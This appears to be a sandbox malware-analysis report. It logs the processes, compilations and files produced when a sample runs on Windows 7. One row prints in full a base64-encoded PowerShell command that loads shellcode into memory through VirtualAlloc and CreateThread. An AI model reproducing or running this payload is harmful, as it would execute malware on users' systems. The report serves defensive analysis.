iADsAfQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2916 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABCAFoAbwAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEIAWgBvACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABjADIALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4AGIAZQAsADAAeAAwADEALAAwAHgAOQAzACwAMAB4ADYAMwAsADAAeAA3ADAALAAwAHgANQBhACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAAzADEALAAwAHgANwAyACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAyACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAyACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZgA0ACwAMAB4ADYAZgAsADAAeAA4AGIALAAwAHgAZgAyACwAMAB4AGYANgAsADAAeAA4AGYALAAwAHgANABjACwAMAB4ADkAMwAsADAAeAA3AGYALAAwAHgANgBhACwAMAB4ADcAZAAsADAAeAA5ADMALAAwAHgAMQBiACwAMAB4AGYAZQAsADAAeAAyAGUALAAwAHgAMgAzACwAMAB4ADYAOAAsADAAeAA1ADIALAAwAHgAYwAzACwAMAB4AGMAOAAsADAAeAAzAGMALAAwAHgANAA3ACwAMAB4ADUAMAAsADAAeABiAGMALAAwAHgAZQA4ACwAMAB4ADYAOAAsADAAeABkADEALAAwAHgAMABiACwAMAB4AGMAZQAsADAAeAA0ADcALAAwAHgAZQAyACwAMAB4ADIAMAAsADAAeAAzADIALAAwAHgAYwA5ACwAMAB4ADYAMAAsADAAeAAzAGIALAAwAHgANgA2ACwAMAB4ADIAOQAsADAAeAA1ADgALAAwAHgAZgA0ACwAMAB4ADcAYgAsADAAeAAyADgALAAwAHgAOQBkACwAMAB4AGUAOQAsADAAeAA3ADEALAAwAHgANwA4ACwAMAB4ADcANgAsADAAeAA2ADUALAAwAHgAMgA3ACwAMAB4ADYAZAAsADAAeABmADMALAAwAHgAMwAzACwAMAB4AGYAYgAsADAAeAAwADYALAAwAHgANABmACwAMAB4AGQANQAsADAAeAA3AGIALAAwAHgAZgBhACwAMAB4ADEAOAAsADAAeABkADQALAAwAHgAYQBhACwAMAB4AGEAZAAsADAAeAAxADMALAAwAHgAOABmACwAMAB4ADYAYwAsADAAeAA0AGYALAAwAHgAZgA3ACwAMAB4AGIAYgAsADAAeAAyADUALAAwAHgANQA3ACwAMAB4ADEANAAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4AGUAYwAsADAAeABlAGUALAAwAHgANwBkACwAMAB4AGYAZgAsADAAeAAyADQALAAwAHgAMwBmACwAMAB4ADcAZAAsADAAeAA1ADMALAAwAHgAMAA5ACwAMAB4ADgAZgAsADAAeAA4AGMALAAwAHgAYQBhACwAMAB4ADQAZAAsADAAeAAyADgALAAwAHgANgBmACwAMAB4AGQAOQAsADAAeABhADcALAAwAHgANABhACwAMAB4ADEAMgAsADAAeABkADkALAAwAHgANwAzACwAMAB4ADMAMAAsADAAeABjADgALAAwAHgANgBjACwAMAB4ADYAMAAsADAAeAA5ADIALAAwAHgAOQBiACwAMAB4AGQANgAsADAAeAA0AGMALAAwAHgAMgAyACwAMAB4ADQAZgAsADAAeAA4ADAALAAwAHgAMAA3ACwAMAB4ADIAOAAsADAAeAAyADQALAAwAHgAYwA3ACwAMAB4ADQAMAAsADAAeAAyAGQALAAwAHgAYgBiACwAMAB4ADAANAAsADAAeABmAGIALAAwAHgANAA5ACwAMAB4ADMAMAAsADAAeABhAGIALAAwAHgAMgBjACwAMAB4AGQAOAAsADAAeAAwADIALAAwAHgAOABmACwAMAB4AGUAOAAsADAAeAA4ADAALAAwAHgAZAAxACwAMAB4AGEAZQAsADAAeABhADkALAAwAHgANgBjACwAMAB4AGIANwAsADAAeABjAGYALAAwAHgAYQBhACwAMAB4AGMAZQAsADAAeAA2ADgALAAwAHgANwA1ACwAMAB4AGEAMAAsADAAeABlADMALAAwAHgANwBkACwAMAB4ADAANAAsADAAeABlAGIALAAwAHgANgBiACwAMAB4AGIAMQAsADAAeAAyADQALAAwAHgAMQA0ACwAMAB4ADYAYwAsADAAeABkAGQALAAwAHgAMwBmACwAMAB4ADYANwAsADAAeAA1AGUALAAwAHgANAAyACwAMAB4AGUAYgAsADAAeABlAGYALAAwAHgAZAAyACwAMAB4ADAAYgAsADAAeAAzADUALAAwAHgAZgA3ACwAMAB4ADYAMwAsADAAeAAxAGIALAAwAHgAYwA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgANABjACwAMAB4ADMAOQAsADAAeABjADgALAAwAHgAMgBjACwAMAB4ADQANAAsADAAeABmAGQALAAwAHgAOQBjACwAMAB4ADcAYwAsADAAeABmAGUALAAwAHgAZAA0ACwAMAB4ADkAYwAsADAAeAAxADYALAAwAHgAZgBlACwAMAB4AGQAOQAsADAAeAA0ADgALAAwAHgAOAAyACwAMAB4AGYANAAsADAAeAA0AGQALAAwAHgAYgAzACwAMAB4AGYAYgAsADAAeAAwADkALAAwAHgAYwBlACwAMAB4ADUAYgAsADAAeABmAGUALAAwAHgAMAA5ACwAMAB4AGQANwAsADAAeAA1ADUALAAwAHgANwA3ACwAMAB4AGUAZgAsADAAeAA4ADcALAAwAHgAMwA5ACwAMAB4AGQAOAAsADAAeABhADAALAAwAHgANgA3ACwAMAB4AGUAYQAsADAAeAA5ADgALAAwAHgAMQAwACwAMAB4ADAAZgAsADAAeABlADAALAAwAHgAMQA2ACwAMAB4ADQAZQAsADAAeAAyAGYALAAwAHgAMABiACwAMAB4AGYAZAAsADAAeABlADcALAAwAHgAYwA1ACwAMAB4AGUANAAsADAAeABhADgALAAwAHgANQAwACwAMAB4ADcAMQAsADAAeAA5AGMALAAwAHgAZgAwACwAMAB4ADIAYgAsADAAeABlADAALAAwAHgANgAxACwAMAB4ADIAZgAsADAAeAA1ADYALAAwAHgAMgAyACwAMAB4AGUAOQAsADAAeABkAGMALAAwAHgAYQA2ACwAMAB4AGUAYwAsADAAeAAxAGEALAAwAHgAYQA4ACwAMAB4AGIANAAsADAAeAA5ADgALAAwAHgAZQBhACwAMAB4AGUANwAsADAAeABlADcALAAwAHgAMABlACwAMAB4AGYANAAsADAAeABkAGQALAAwAHgAOAAyACwAMAB4AGEAZQAsADAAeAA2ADAALAAwAHgAZABhACwAMAB4ADAANAAsADAAeABmADkALAAwAHgAMQBjACwAMAB4AGUAMAAsADAAeAA3ADEALAAwAHgAYwBkACwAMAB4ADgAMgAsADAAeAAxAGIALAAwAHgANQA0ACwAMAB4ADQANgAsADAAeAAwAGEALAAwAHgAOABlACwAMAB4ADEANwAsADAAeAAzADAALAAwAHgANwAzACwAMAB4ADUAZQAsADAAeAA5ADgALAAwAHgAYwAwACwAMAB4ADIANQAsADAAeAAzADQALAAwAHgAOQA4ACwAMAB4AGEAOAAsADAAeAA5ADEALAAwAHgANgBjACwAMAB4AGMAYgAsADAAeABjAGQALAAwAHgAZABkACwAMAB4AGIAOAAsADAAeAA3AGYALAAwAHgANQBlACwAMAB4ADQAOAAsADAAeAA0ADMALAAwAHgAZAA2ACwAMAB4ADMAMwAsADAAeABkAGIALAAwAHgAMgBiACwAMAB4AGQANAAsADAAeAA2AGEALAAwAHgAMgBiACwAMAB4AGYANAAsADAAeAAyADcALAAwAHgANQA5ACwAMAB4AGEAZAAsADAAeABjADgALAAwAHgAZgAxACwAMAB4AGEANwAsADAAeABkAGIALAAwAHgAMgAwACwAMAB4AGMAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQASgBYAEEASAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQASgBYAEEASAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBYAEEASAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1924 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\on7njtwb.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
4060 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES68B0.tmp" "c:\Users\admin\AppData\Local\Temp\CSC68AF.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2320 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BTRKUQNZQU9FLGJQLOQ5.temp | — | |
MD5:— | SHA256:— | |||
2916 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9OBHQLRKUSRGZX98WAAZ.temp | — | |
MD5:— | SHA256:— | |||
1924 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC68AF.tmp | — | |
MD5:— | SHA256:— | |||
1924 | csc.exe | C:\Users\admin\AppData\Local\Temp\on7njtwb.pdb | — | |
MD5:— | SHA256:— | |||
4060 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES68B0.tmp | — | |
MD5:— | SHA256:— | |||
1924 | csc.exe | C:\Users\admin\AppData\Local\Temp\on7njtwb.dll | — | |
MD5:— | SHA256:— | |||
1924 | csc.exe | C:\Users\admin\AppData\Local\Temp\on7njtwb.out | — | |
MD5:— | SHA256:— | |||
2916 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF106582.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2320 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF106311.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2916 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|